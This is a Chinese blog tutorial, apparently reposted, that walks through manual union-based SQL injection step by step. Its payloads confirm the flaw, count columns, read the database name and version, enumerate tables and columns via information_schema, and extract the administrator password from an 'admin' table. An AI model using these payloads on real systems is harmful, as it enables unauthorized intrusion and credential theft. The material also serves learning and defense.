注入（一） - 代码天地

注入（一）

其他 2019-06-28 20:28:18 阅读次数: 0

基本步骤

第一步，判断是否存在sql注入漏洞
构造 ?id=1 and 1=1 ，回车
页面返回正常

构造 ?id=1 and 1=2 ,回车
页面不正常，初步判断这里可能存在一个注入漏洞
第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
页面正常

构造 ?id=1 and 1=1 order by 2 回车
页面正常

构造 ?id=1 and 1=1 order by 3 回车
页面返回错误，判断字段数为 2
第三步：判断会显点
构造 ?id=1 and 1=2 union select 1,2 回车
页面出现了 2 ，说明我们可以在数字 2 处显示我们想要的内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
查询当前数据库版本

构造 ?id=1 and 1=2 union select 1,version() 回车
查询当前数据库表名
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车
绝大数情况下，管理员的账号密码都在admin表里
查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车
查出 admin 表里有 id username password 三个字段
构造 ?id=1 and 1=2 union select 1,password from admin limit 1,1 回车
limit 1,1 没有回显，说明只有一个用户

构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车
得到管理员账号和密码

猜你喜欢

转载自www.cnblogs.com/tomyyyyy/p/11104541.html

注入（一）

SQL注入一：注入原理

python与sql注入（一）

SQL注入总结（一）

spring依赖注入（一）

mysql 注入安全一

sql注入一

Sql注入（一）

BUUOJ的SQL注入（一）

(一)属性注入方式

自学sql注入（一）

SQLI注入（一）

Sql注入实验一

Mysql注入之一联合注入

Spring注入方式（一、设值注入）

php安全（一）：sql注入

实验吧一注入题

sql注入原理详解（一）

cookie注入原理详解（一）

【SQL】SQL注入攻击（一）

C# 依赖注入（一）

Redtiger SQL注入练习（一）

Mysql 一般注入

SQL注入学习(一)

SQL注入与防御研究（一）

SQL注入学习（一）

基于POST的SQL注入（一）

搭建SQL注入环境（一）

小白谈SQL注入(一)

一次Access注入

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)